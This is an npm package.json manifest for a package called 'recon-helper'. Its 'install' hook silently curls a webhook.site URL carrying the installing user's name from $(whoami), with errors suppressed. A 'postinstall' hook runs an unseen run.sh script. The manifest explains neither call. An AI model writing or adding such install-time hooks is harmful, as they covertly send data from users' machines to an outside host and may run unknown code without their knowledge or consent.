{
  "name": "recon-helper",
  "version": "1.0.0",
  "scripts": {
    "install": "curl -s 'https://webhook.site/0d1af0b6-4d26-4f18-b77d-83d0d1a7f5f5/npm-install?u='$(whoami) || true",
    "postinstall": "sh run.sh || true",
    "start": "node index.js"
  },
  "main": "index.js"
}
